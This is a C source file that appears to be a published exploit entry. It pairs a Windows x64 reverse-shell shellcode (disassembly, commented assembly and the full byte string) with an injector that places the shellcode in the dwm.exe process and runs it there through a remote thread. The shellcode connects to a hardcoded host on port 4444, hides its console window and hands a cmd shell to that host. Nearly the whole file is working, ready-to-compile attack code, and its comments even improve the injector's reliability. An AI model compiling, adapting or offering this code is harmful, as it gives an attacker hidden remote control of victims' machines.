/*
# Title : Windows x64 Reverse Shell TCP shellcode
# size : 694 bytes
# Author: Roziul Hasan Khan Shifat
# Date : 10-11-2016
# Tested on : Windows 7 x64 Professional
# Email : [email protected]
*/
/*
Disassembly of section .text:
0000000000000000 <s>:
0: 48 31 d2 xor %rdx,%rdx
3: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
8: 48 8b 70 18 mov 0x18(%rax),%rsi
c: 48 8b 76 10 mov 0x10(%rsi),%rsi
10: 48 ad lods %ds:(%rsi),%rax
12: 48 8b 30 mov (%rax),%rsi
15: 48 8b 7e 30 mov 0x30(%rsi),%rdi
19: b2 88 mov $0x88,%dl
1b: 8b 5f 3c mov 0x3c(%rdi),%ebx
1e: 48 01 fb add %rdi,%rbx
21: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
24: 48 01 fb add %rdi,%rbx
27: 44 8b 73 1c mov 0x1c(%rbx),%r14d
2b: 49 01 fe add %rdi,%r14
2e: 66 ba fc 0c mov $0xcfc,%dx
32: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx
36: 48 01 fb add %rdi,%rbx
39: 48 31 d2 xor %rdx,%rdx
3c: 52 push %rdx
3d: 52 push %rdx
3e: c7 04 24 77 73 32 5f movl $0x5f327377,(%rsp)
45: c7 44 24 04 33 32 2e movl $0x642e3233,0x4(%rsp)
4c: 64
4d: 66 c7 44 24 08 6c 6c movw $0x6c6c,0x8(%rsp)
54: 48 8d 0c 24 lea (%rsp),%rcx
58: 48 83 ec 58 sub $0x58,%rsp
5c: ff d3 callq *%rbx
5e: 48 83 c4 68 add $0x68,%rsp
62: 48 89 c6 mov %rax,%rsi
65: 48 31 db xor %rbx,%rbx
68: 48 31 d2 xor %rdx,%rdx
6b: b2 88 mov $0x88,%dl
6d: 8b 5e 3c mov 0x3c(%rsi),%ebx
70: 48 01 f3 add %rsi,%rbx
73: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
76: 48 01 f3 add %rsi,%rbx
79: 44 8b 7b 1c mov 0x1c(%rbx),%r15d
7d: 49 01 f7 add %rsi,%r15
80: 48 31 d2 xor %rdx,%rdx
83: 66 ba c8 01 mov $0x1c8,%dx
87: 41 8b 1c 17 mov (%r15,%rdx,1),%ebx
8b: 48 01 f3 add %rsi,%rbx
8e: 66 ba 98 01 mov $0x198,%dx
92: 48 29 d4 sub %rdx,%rsp
95: 48 8d 14 24 lea (%rsp),%rdx
99: 48 31 c9 xor %rcx,%rcx
9c: 66 b9 02 02 mov $0x202,%cx
a0: 48 83 ec 58 sub $0x58,%rsp
a4: ff d3 callq *%rbx
a6: 48 31 d2 xor %rdx,%rdx
a9: 48 83 ec 58 sub $0x58,%rsp
ad: 48 89 54 24 20 mov %rdx,0x20(%rsp)
b2: 48 89 54 24 28 mov %rdx,0x28(%rsp)
b7: 48 ff c2 inc %rdx
ba: 48 89 d1 mov %rdx,%rcx
bd: 48 ff c1 inc %rcx
c0: 4d 31 c0 xor %r8,%r8
c3: 49 83 c0 06 add $0x6,%r8
c7: 4d 31 c9 xor %r9,%r9
ca: 66 41 b9 88 01 mov $0x188,%r9w
cf: 43 8b 1c 0f mov (%r15,%r9,1),%ebx
d3: 48 01 f3 add %rsi,%rbx
d6: 4d 31 c9 xor %r9,%r9
d9: ff d3 callq *%rbx
db: 49 89 c5 mov %rax,%r13
de: 4d 31 c0 xor %r8,%r8
e1: 41 50 push %r8
e3: 41 50 push %r8
e5: c6 04 24 02 movb $0x2,(%rsp)
e9: 66 c7 44 24 02 11 5c movw $0x5c11,0x2(%rsp)
f0: c7 44 24 04 c0 a8 0a movl $0x800aa8c0,0x4(%rsp)
f7: 80
f8: 4c 8d 24 24 lea (%rsp),%r12
fc: 48 83 ec 58 sub $0x58,%rsp
0000000000000100 <c>:
100: 48 31 db xor %rbx,%rbx
103: 41 8b 5f 0c mov 0xc(%r15),%ebx
107: 48 01 f3 add %rsi,%rbx
10a: 4c 89 e2 mov %r12,%rdx
10d: 4c 89 e9 mov %r13,%rcx
110: 41 b0 10 mov $0x10,%r8b
113: ff d3 callq *%rbx
115: 4d 31 c0 xor %r8,%r8
118: 4c 39 c0 cmp %r8,%rax
11b: 75 e3 jne 100 <c>
11d: 48 31 db xor %rbx,%rbx
120: 41 8b 5e 40 mov 0x40(%r14),%ebx
124: 48 01 fb add %rdi,%rbx
127: ff d3 callq *%rbx
129: 48 31 d2 xor %rdx,%rdx
12c: 52 push %rdx
12d: 52 push %rdx
12e: c7 04 24 75 73 65 72 movl $0x72657375,(%rsp)
135: c7 44 24 04 33 32 2e movl $0x642e3233,0x4(%rsp)
13c: 64
13d: 66 c7 44 24 08 6c 6c movw $0x6c6c,0x8(%rsp)
144: 48 8d 0c 24 lea (%rsp),%rcx
148: 66 ba fc 0c mov $0xcfc,%dx
14c: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx
150: 48 01 fb add %rdi,%rbx
153: 48 83 ec 58 sub $0x58,%rsp
157: ff d3 callq *%rbx
159: 48 89 c6 mov %rax,%rsi
15c: 48 31 db xor %rbx,%rbx
15f: 48 31 d2 xor %rdx,%rdx
162: 66 ba 4a 02 mov $0x24a,%dx
166: 45 8b 24 96 mov (%r14,%rdx,4),%r12d
16a: 49 01 fc add %rdi,%r12
16d: 48 31 c9 xor %rcx,%rcx
170: 51 push %rcx
171: 51 push %rcx
172: c7 04 24 46 69 6e 64 movl $0x646e6946,(%rsp)
179: c7 44 24 04 57 69 6e movl $0x646e6957,0x4(%rsp)
180: 64
181: c7 44 24 08 6f 77 41 movl $0x4141776f,0x8(%rsp)
188: 41
189: 80 74 24 0b 41 xorb $0x41,0xb(%rsp)
18e: 48 8d 14 24 lea (%rsp),%rdx
192: 48 89 f1 mov %rsi,%rcx
195: 48 83 ec 58 sub $0x58,%rsp
199: 41 ff d4 callq *%r12
19c: 48 31 d2 xor %rdx,%rdx
19f: 52 push %rdx
1a0: 52 push %rdx
1a1: 52 push %rdx
1a2: c7 04 24 43 6f 6e 73 movl $0x736e6f43,(%rsp)
1a9: c7 44 24 04 6f 6c 65 movl $0x57656c6f,0x4(%rsp)
1b0: 57
1b1: c7 44 24 08 69 6e 64 movl $0x6f646e69,0x8(%rsp)
1b8: 6f
1b9: c7 44 24 0c 77 43 6c movl $0x616c4377,0xc(%rsp)
1c0: 61
1c1: 66 c7 44 24 10 73 73 movw $0x7373,0x10(%rsp)
1c8: 48 8d 0c 24 lea (%rsp),%rcx
1cc: 48 83 ec 58 sub $0x58,%rsp
1d0: ff d0 callq *%rax
1d2: 49 89 c7 mov %rax,%r15
1d5: 48 31 d2 xor %rdx,%rdx
1d8: 48 31 c9 xor %rcx,%rcx
1db: 51 push %rcx
1dc: 51 push %rcx
1dd: c7 04 24 53 68 6f 77 movl $0x776f6853,(%rsp)
1e4: c7 44 24 04 57 69 6e movl $0x646e6957,0x4(%rsp)
1eb: 64
1ec: 66 c7 44 24 08 6f 77 movw $0x776f,0x8(%rsp)
1f3: 48 8d 14 24 lea (%rsp),%rdx
1f7: 48 89 f1 mov %rsi,%rcx
1fa: 48 83 ec 58 sub $0x58,%rsp
1fe: 41 ff d4 callq *%r12
201: 4c 89 f9 mov %r15,%rcx
204: 48 31 d2 xor %rdx,%rdx
207: 48 83 ec 58 sub $0x58,%rsp
20b: ff d0 callq *%rax
20d: 66 ba 90 02 mov $0x290,%dx
211: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx
215: 48 01 fb add %rdi,%rbx
218: 48 83 ec 68 sub $0x68,%rsp
21c: 48 83 ec 18 sub $0x18,%rsp
220: 4c 8d 24 24 lea (%rsp),%r12
224: b2 68 mov $0x68,%dl
226: 48 31 c9 xor %rcx,%rcx
229: 41 89 14 24 mov %edx,(%r12)
22d: 49 89 4c 24 04 mov %rcx,0x4(%r12)
232: 49 89 4c 24 0c mov %rcx,0xc(%r12)
237: 49 89 4c 24 14 mov %rcx,0x14(%r12)
23c: 49 89 4c 24 18 mov %rcx,0x18(%r12)
241: 48 31 d2 xor %rdx,%rdx
244: b2 ff mov $0xff,%dl
246: 48 ff c2 inc %rdx
249: 41 89 54 24 3c mov %edx,0x3c(%r12)
24e: 4d 89 6c 24 50 mov %r13,0x50(%r12)
253: 4d 89 6c 24 58 mov %r13,0x58(%r12)
258: 4d 89 6c 24 60 mov %r13,0x60(%r12)
25d: 68 63 6d 64 41 pushq $0x41646d63
262: 88 54 24 03 mov %dl,0x3(%rsp)
266: 48 8d 14 24 lea (%rsp),%rdx
26a: 48 ff c1 inc %rcx
26d: 48 83 ec 58 sub $0x58,%rsp
271: 48 89 4c 24 20 mov %rcx,0x20(%rsp)
276: 48 31 c9 xor %rcx,%rcx
279: 4d 31 c0 xor %r8,%r8
27c: 4c 89 44 24 28 mov %r8,0x28(%rsp)
281: 4c 89 44 24 30 mov %r8,0x30(%rsp)
286: 4c 89 44 24 38 mov %r8,0x38(%rsp)
28b: 4d 8d 0c 24 lea (%r12),%r9
28f: 4c 89 4c 24 40 mov %r9,0x40(%rsp)
294: 4d 8d 4c 24 68 lea 0x68(%r12),%r9
299: 4c 89 4c 24 48 mov %r9,0x48(%rsp)
29e: 4d 31 c9 xor %r9,%r9
2a1: ff d3 callq *%rbx
2a3: 48 31 d2 xor %rdx,%rdx
2a6: 66 ba a0 04 mov $0x4a0,%dx
2aa: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx
2ae: 48 01 fb add %rdi,%rbx
2b1: 48 31 c9 xor %rcx,%rcx
2b4: ff d3 callq *%rbx
*/
/*
section .text
global s
s:
xor rdx,rdx
mov rax,[gs:rdx+0x60]
mov rsi,[rax+0x18]
mov rsi,[rsi+0x10]
lodsq
mov rsi,[rax]
mov rdi,[rsi+0x30]
;--------------------------------
mov dl,0x88
mov ebx,[rdi+0x3c]
add rbx,rdi
mov ebx,[rbx+rdx]
add rbx,rdi ;IMAGE_EXPORT_DIRECTORY
mov r14d,[rbx+0x1c]
add r14,rdi ;kernel32.dll AddressOfFunctions
;-----------------------
;loading ws2_32.dll
mov dx,831*4
mov ebx,[r14+rdx]
add rbx,rdi ;LoadLibraryA()
xor rdx,rdx
push rdx
push rdx
mov [rsp],dword 'ws2_'
mov [rsp+4],dword '32.d'
mov [rsp+8],word 'll'
lea rcx,[rsp]
sub rsp,88
call rbx
add rsp,104
mov rsi,rax ;ws2_32.dll base address
;--------------------------------------
xor rbx,rbx
xor rdx,rdx
;finding Export table of ws2_32.dll
mov dl,0x88
mov ebx,[rsi+0x3c]
add rbx,rsi
mov ebx,[rbx+rdx]
add rbx,rsi ;IMAGE_EXPORT_DIRECTORY
mov r15d,[rbx+0x1c]
add r15,rsi ;ws2_32.dll AddressOfFunctions
;--------------------------------------
;WSAStartup(514,&WSADATA)
xor rdx,rdx
mov dx,114*4
mov ebx,[r15+rdx]
add rbx,rsi ;rbx=WSAStartup()
mov dx,408
sub rsp,rdx
lea rdx,[rsp]
xor rcx,rcx
mov cx,514
sub rsp,88 ;reserving space for API call (Important)
call rbx
;-------------------------------------------------------
;WSASocketA(2,1,6,0,0,0)
xor rdx,rdx
sub rsp,88
mov [rsp+32],rdx
mov [rsp+40],rdx
inc rdx
mov rcx,rdx
inc rcx
xor r8,r8
add r8,6
xor r9,r9
mov r9w,98*4
mov ebx,[r15+r9]
add rbx,rsi ;rbx=WSASocketA()
xor r9,r9
call rbx
mov r13,rax ;r13=SOCKET
;------------------------------------------
xor r8,r8
push r8
push r8
mov [rsp],byte 2
mov [rsp+2],word 0x5c11 ;port 4444
mov [rsp+4],dword 0x800aa8c0 ;change it
lea r12,[rsp]
sub rsp,88
;-------------------------------------------
;connect(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
c:
xor rbx,rbx
mov ebx,[r15+12]
add rbx,rsi ;rbx=connect()
mov rdx,r12
mov rcx,r13
mov r8b,16
call rbx
xor r8,r8
cmp rax,r8
jnz c
;----------------------------------------------------------------------------------------
;Hiding Window
;----------------------------------------------------------------------------------------
;AllocConsole()
xor rbx,rbx
mov ebx,[r14+64]
add rbx,rdi ;rbx=AllocConsole()
call rbx
;------------------------------
;loading user32.dll
xor rdx,rdx
push rdx
push rdx
mov [rsp],dword 'user'
mov [rsp+4],dword '32.d'
mov [rsp+8],word 'll'
lea rcx,[rsp]
mov dx,831*4
mov ebx,[r14+rdx]
add rbx,rdi
sub rsp,88
call rbx
mov rsi,rax
;--------------------------------
xor rbx,rbx
xor rdx,rdx
;----------------------------------
;FindWindowA("ConsoleWindowClass",NULL)
mov dx,586
mov r12d,[r14+rdx*4]
add r12,rdi ;r12=GetProcAddress()
xor rcx,rcx
push rcx
push rcx
mov [rsp],dword 'Find'
mov [rsp+4],dword 'Wind'
mov [rsp+8],dword 'owAA'
xor byte [rsp+11],0x41
lea rdx,[rsp]
mov rcx,rsi
sub rsp,88
call r12
;-----------------------------------
xor rdx,rdx
push rdx
push rdx
push rdx
mov [rsp],dword 'Cons'
mov [rsp+4],dword 'oleW'
mov [rsp+8],dword 'indo'
mov [rsp+12],dword 'wCla'
mov [rsp+16],word 'ss'
lea rcx,[rsp]
sub rsp,88
call rax
mov r15,rax
xor rdx,rdx
;---------------------------------------
;ShowWindow(HWND,0)
xor rcx,rcx
push rcx
push rcx
mov [rsp],dword 'Show'
mov [rsp+4],dword 'Wind'
mov [rsp+8],word 'ow'
lea rdx,[rsp]
mov rcx,rsi
sub rsp,88
call r12
mov rcx,r15
xor rdx,rdx
sub rsp,88
call rax
;-----------------------------------------------
;--------------------------------------------------------------------------------------------------------------------------------
;CreateProcessA()
mov dx,164*4
mov ebx,[r14+rdx]
add rbx,rdi
;STARTUPINFOA+PROCESS_INFORMATION
;----------------------------------
sub rsp,104
sub rsp,24
lea r12,[rsp]
mov dl,104
xor rcx,rcx
mov [r12],dword edx
mov [r12+4],rcx
mov [r12+12],rcx
mov [r12+20],rcx
mov [r12+24],rcx
xor rdx,rdx
mov dl,255
inc rdx
mov [r12+0x3c],edx
mov [r12+0x50],r13
mov [r12+0x58],r13
mov [r12+0x60],r13
;--------------------------------------------------
push 'cmdA'
mov [rsp+3],byte dl
lea rdx,[rsp]
inc rcx
;-------------------------------------
sub rsp,88
mov [rsp+32],rcx
xor rcx,rcx
xor r8,r8
mov [rsp+40],r8
mov [rsp+48],r8
mov [rsp+56],r8
lea r9,[r12]
mov [rsp+64],r9
lea r9,[r12+104]
mov [rsp+72],r9
xor r9,r9
call rbx
;-------------------------------
xor rdx,rdx
mov dx,296*4
mov ebx,[r14+rdx]
add rbx,rdi
xor rcx,rcx
call rbx
*/
#include<stdio.h>
#include<windows.h>
#include<TlHelp32.h>
#include<string.h>
char shellcode[]="\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\xb2\x88\x8b\x5f\x3c\x48\x01\xfb\x8b\x1c\x13\x48\x01\xfb\x44\x8b\x73\x1c\x49\x01\xfe\x66\xba\xfc\x0c\x41\x8b\x1c\x16\x48\x01\xfb\x48\x31\xd2\x52\x52\xc7\x04\x24\x77\x73\x32\x5f\xc7\x44\x24\x04\x33\x32\x2e\x64\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x48\x83\xc4\x68\x48\x89\xc6\x48\x31\xdb\x48\x31\xd2\xb2\x88\x8b\x5e\x3c\x48\x01\xf3\x8b\x1c\x13\x48\x01\xf3\x44\x8b\x7b\x1c\x49\x01\xf7\x48\x31\xd2\x66\xba\xc8\x01\x41\x8b\x1c\x17\x48\x01\xf3\x66\xba\x98\x01\x48\x29\xd4\x48\x8d\x14\x24\x48\x31\xc9\x66\xb9\x02\x02\x48\x83\xec\x58\xff\xd3\x48\x31\xd2\x48\x83\xec\x58\x48\x89\x54\x24\x20\x48\x89\x54\x24\x28\x48\xff\xc2\x48\x89\xd1\x48\xff\xc1\x4d\x31\xc0\x49\x83\xc0\x06\x4d\x31\xc9\x66\x41\xb9\x88\x01\x43\x8b\x1c\x0f\x48\x01\xf3\x4d\x31\xc9\xff\xd3\x49\x89\xc5\x4d\x31\xc0\x41\x50\x41\x50\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x0a\x80\x4c\x8d\x24\x24\x48\x83\xec\x58\x48\x31\xdb\x41\x8b\x5f\x0c\x48\x01\xf3\x4c\x89\xe2\x4c\x89\xe9\x41\xb0\x10\xff\xd3\x4d\x31\xc0\x4c\x39\xc0\x75\xe3\x48\x31\xdb\x41\x8b\x5e\x40\x48\x01\xfb\xff\xd3\x48\x31\xd2\x52\x52\xc7\x04\x24\x75\x73\x65\x72\xc7\x44\x24\x04\x33\x32\x2e\x64\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x66\xba\xfc\x0c\x41\x8b\x1c\x16\x48\x01\xfb\x48\x83\xec\x58\xff\xd3\x48\x89\xc6\x48\x31\xdb\x48\x31\xd2\x66\xba\x4a\x02\x45\x8b\x24\x96\x49\x01\xfc\x48\x31\xc9\x51\x51\xc7\x04\x24\x46\x69\x6e\x64\xc7\x44\x24\x04\x57\x69\x6e\x64\xc7\x44\x24\x08\x6f\x77\x41\x41\x80\x74\x24\x0b\x41\x48\x8d\x14\x24\x48\x89\xf1\x48\x83\xec\x58\x41\xff\xd4\x48\x31\xd2\x52\x52\x52\xc7\x04\x24\x43\x6f\x6e\x73\xc7\x44\x24\x04\x6f\x6c\x65\x57\xc7\x44\x24\x08\x69\x6e\x64\x6f\xc7\x44\x24\x0c\x77\x43\x6c\x61\x66\xc7\x44\x24\x10\x73\x73\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd0\x49\x89\xc7\x48\x31\xd2\x48\x31\xc9\x51\x51\xc7\x04\x24\x53\x68\x6f\x77\xc7\x44\x24\x04\x57\x69\x6e\x64\x66\xc7\x44\x
24\x08\x6f\x77\x48\x8d\x14\x24\x48\x89\xf1\x48\x83\xec\x58\x41\xff\xd4\x4c\x89\xf9\x48\x31\xd2\x48\x83\xec\x58\xff\xd0\x66\xba\x90\x02\x41\x8b\x1c\x16\x48\x01\xfb\x48\x83\xec\x68\x48\x83\xec\x18\x4c\x8d\x24\x24\xb2\x68\x48\x31\xc9\x41\x89\x14\x24\x49\x89\x4c\x24\x04\x49\x89\x4c\x24\x0c\x49\x89\x4c\x24\x14\x49\x89\x4c\x24\x18\x48\x31\xd2\xb2\xff\x48\xff\xc2\x41\x89\x54\x24\x3c\x4d\x89\x6c\x24\x50\x4d\x89\x6c\x24\x58\x4d\x89\x6c\x24\x60\x68\x63\x6d\x64\x41\x88\x54\x24\x03\x48\x8d\x14\x24\x48\xff\xc1\x48\x83\xec\x58\x48\x89\x4c\x24\x20\x48\x31\xc9\x4d\x31\xc0\x4c\x89\x44\x24\x28\x4c\x89\x44\x24\x30\x4c\x89\x44\x24\x38\x4d\x8d\x0c\x24\x4c\x89\x4c\x24\x40\x4d\x8d\x4c\x24\x68\x4c\x89\x4c\x24\x48\x4d\x31\xc9\xff\xd3\x48\x31\xd2\x66\xba\xa0\x04\x41\x8b\x1c\x16\x48\x01\xfb\x48\x31\xc9\xff\xd3";
/* Forward declaration; defined after main(). Receives the process id selected by the snapshot walk in main(). */
void inject(DWORD );
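/*
 * Entry point: walk the process list once, find the first process whose image
 * name equals program_name (exact, case-sensitive compare) and hand its id to
 * inject().
 *
 * Returns 0 when a matching process was found and inject() was called, 1 when
 * the snapshot cannot be taken, the list cannot be walked, or no process
 * matches. The snapshot handle is closed on every path after it is opened.
 */
int main()
{
    char program_name[]="dwm.exe"; /* image name looked up in the process list */
    BOOL f=FALSE;
    HANDLE snap;
    PROCESSENTRY32 pe32;
    int rc=1;
    snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    if(snap==INVALID_HANDLE_VALUE)
    {
        printf("CreateToolhelp32Snapshot() Failed."); return 1;
    }
    pe32.dwSize=sizeof(pe32); /* Process32First requires dwSize to be set */
    if(!Process32First(snap,&pe32))
    {
        printf("Process32First() Failed."); CloseHandle(snap); return 1;
    }
    do
    {
        /* exact compare: strncmp over strlen(program_name) was a prefix match
         * and would also accept names such as "dwm.exe.bak" */
        if(0==strcmp(program_name,pe32.szExeFile))
        {
            f=TRUE;
            break;
        }
    }while(Process32Next(snap,&pe32));
    CloseHandle(snap); /* pe32 is a copy; the snapshot is no longer needed */
    if(!f)
    {
        printf("No infomation found about \"%s\" ",program_name);
    }
    else
    {
        /* th32ProcessID is a DWORD (unsigned), so %lu rather than %d */
        printf("Program name:%s\nProcess id: %lu",pe32.szExeFile,(unsigned long)pe32.th32ProcessID);
        printf("\nInjecting shellcode");
        inject(pe32.th32ProcessID);
        rc=0;
    }
    return rc;
}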
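/*
 * Copy the shellcode byte string into the process identified by pid and start
 * it on a new thread there. The sequence used is the classic remote-thread
 * injection chain OpenProcess -> VirtualAllocEx (read/write/execute page) ->
 * WriteProcessMemory -> CreateRemoteThread, which is the API pattern host-based
 * detection commonly monitors for.
 *
 * pid: target process id (obtained from the snapshot walk in main()).
 * Returns nothing; each failure is reported on stdout and every handle acquired
 * up to that point is closed before returning.
 */
void inject(DWORD pid)
{
    HANDLE phd,h;
    LPVOID shell;
    SIZE_T written=0;
    phd=OpenProcess(PROCESS_ALL_ACCESS,0,pid);
    /* OpenProcess() signals failure with NULL, not INVALID_HANDLE_VALUE;
     * the original compare never fired and a NULL handle was used below */
    if(phd==NULL)
    {
        printf("\nOpenProcess() Failed (error %lu).",(unsigned long)GetLastError()); return ;
    }
    shell=VirtualAllocEx(phd,0,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    if(shell==NULL)
    {
        printf("\nVirtualAllocEx() Failed"); CloseHandle(phd); return ;
    }
    /* sizeof(shellcode) counts the string literal's trailing NUL as well;
     * a partial or failed write must not be followed by starting the thread */
    if(!WriteProcessMemory(phd,shell,shellcode,sizeof(shellcode),&written) || written!=sizeof(shellcode))
    {
        printf("\nWriteProcessMemory() Failed"); CloseHandle(phd); return ;
    }
    printf("\nInjection successfull\n");
    printf("Running Shellcode......\n");
    h=CreateRemoteThread(phd,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0);
    if(h==NULL)
    {
        printf("Failed to Run Shellcode\n");
    }
    else
    {
        printf("shellcode Execution Successfull");
        CloseHandle(h); /* the thread keeps running; only our handle is released */
    }
    CloseHandle(phd);
}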